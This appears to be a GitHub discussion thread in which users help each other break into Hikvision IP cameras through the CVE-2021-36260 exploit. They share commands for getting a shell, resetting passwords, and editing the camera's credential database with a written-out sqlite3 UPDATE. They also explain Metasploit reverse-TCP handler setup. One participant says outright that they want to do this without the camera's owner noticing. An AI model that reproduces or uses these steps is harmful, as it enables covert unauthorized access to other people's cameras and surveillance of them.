I can't view the HIKVISION cam via cve_2021_36260 #9
-
As described in title, how can solve it? |
Beta Was this translation helpful? Give feedback.
Replies: 49 comments 2 replies
-
I know a not so good way: Firstly, login in the device by: python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell After you login in, execute the following command: resetParam After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser. The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device |
Beta Was this translation helpful? Give feedback.
-
If anyone knows how to deal this, I hope they can give us some advice and maybe even integrate batch code into the project. Our team can't thank you enough. |
Beta Was this translation helpful? Give feedback.
-
But if I do this, the owner of the cam will understand what happened as he can't log in his web one day(doge). It will be awesome if there is an anonymous way to do it. |
Beta Was this translation helpful? Give feedback.
-
If we can read the username and password via shell, or disable the web authorization, it will be a great job. |
Beta Was this translation helpful? Give feedback.
-
|
Beta Was this translation helpful? Give feedback.
-
I know the author who report this bug can "Disable web authentication and login to target camera admin web pages with any password", but there is no more detail about how to reproduction it. |
Beta Was this translation helpful? Give feedback.
-
I am not sure whether the /etc/passwd is the same pwd with the web auth. If it is, maybe we can create a new account or just use the encrypted pwd to login?(maybe the encryption method is different so that it is not useful) |
Beta Was this translation helpful? Give feedback.
-
Nice work. I will try to consult the author by email |
Beta Was this translation helpful? Give feedback.
-
Waiting for your good news. |
Beta Was this translation helpful? Give feedback.
-
The --shell command does not work. ssh error. Help solve the problem. |
Beta Was this translation helpful? Give feedback.
-
I'm sorry, I'm not sure if it's the device or the code. Since CVE-2021-36260.py is directly from here, we haven't changed it. |
Beta Was this translation helpful? Give feedback.
-
there is sqlite db which is accessible from shell at /devinfo/ipc_db use metasploit with reverse tcp handler if target is behind nat on remote network example here: https://www.youtube.com/watch?v=3NzdQxqZJqc
idx=2 is empty idx=1 user=admin passwd=admin12345 after adding from www new user type operator and all possible rights user=default passwd=admin12345
im not db guru but maybe adding same into another db where admin is not known will work, need to test eg: sqlite3 ipc_db "update sec_user_mana_info set username=':9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a',passwd=':eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b',ipv4_addr=0,ipv6_addr='0:0:0:0:',mac_addr='000000000000000000',permission=39575552,priority=0,user_level=1,user_num=0,preview_permision=1,playback_permision=1,record_permision=1,ptzctrl_permision=0 where idx=2;" quick test:
trying add from cmdline:
perhaps there are simpler methods without adding new user but simply decode admin password saved in db |
Beta Was this translation helpful? Give feedback.
-
it seems afterr updating idx=2 as side effect idx=1 disappears maybe someone better will fix it |
Beta Was this translation helpful? Give feedback.
-
Maybe we can read its source code to get its encrypt method so that we can decode it easier. |
Beta Was this translation helpful? Give feedback.
-
from msfwconsole started shell
it seems after starting shell its somehow outside of the box, behavior is dirrefent than from msfwconsole itself
ps from msfw shows database_process net_process are already deleted as we can see at end of starting script
why not create tgz of working filesystem and download will be easier than using binwalk
done |
Beta Was this translation helpful? Give feedback.
-
My PC and target cam both are in our campus Lan. |
Beta Was this translation helpful? Give feedback.
-
I don't have public ip address. |
Beta Was this translation helpful? Give feedback.
-
your ip and cam ip are in same subnet ? |
Beta Was this translation helpful? Give feedback.
-
No |
Beta Was this translation helpful? Give feedback.
-
if cam cant contact with you at ip you set in LHOST and port 4444 it will not work, imagine you wait for important call but you didnt inform caller what is your phone number or you turned phone off |
Beta Was this translation helpful? Give feedback.
-
But why can I use POC on https://github.com/Aiminsun/CVE-2021-36260 to get the target shell? |
Beta Was this translation helpful? Give feedback.
-
most probably because you call to camera which is reachable at its ip and port you told her to open for you |
Beta Was this translation helpful? Give feedback.
-
It seems that I forget to open my port 4444😂Must I open it manually? |
Beta Was this translation helpful? Give feedback.
-
[] Started reverse TCP handler on Yo.ur.ip:4444 |
Beta Was this translation helpful? Give feedback.
-
Mine is the same with you. |
Beta Was this translation helpful? Give feedback.
-
if poc is working metasploit has to work too, there is no other option. try again but this time skip "set target 1" part (or if you did not use it before now its good moment to try) this simply set from which way connection is initiated. without target=1 you initiate connection and trying to connect to cam, with target set to 1 you inform cam that cam has to call to you after payload is finished sending because you cannot reach her (or it whatever...) I am really trying to help but it looks like conversation of deaf with blind. You say "it did not work for me" and I am trying to figure out why but I am shooting in darkness with hope I will hit reason. |
Beta Was this translation helpful? Give feedback.
-
Beta Was this translation helpful? Give feedback.
-
tell me in which word I said anything about 0 ? world is not just binary. I told you to SKIP that step. |
Beta Was this translation helpful? Give feedback.
-
Beta Was this translation helpful? Give feedback.
-
a little update: uploaded modified ipc_db, reboot, logged in as admin and voila: questions? :) |
Beta Was this translation helpful? Give feedback.
a little update:
took a cam with cve-2021-36260 and weak known pwd, added 4 dummy users 111111 2222 3333 44444 (length is not important atm)
downloaded ipc_db, opened in sqlitebrowser, replaced entries for 222 333 444 as shown below:
uploaded modified ipc_db, reboot, logged in as admin and voila:
questions? :)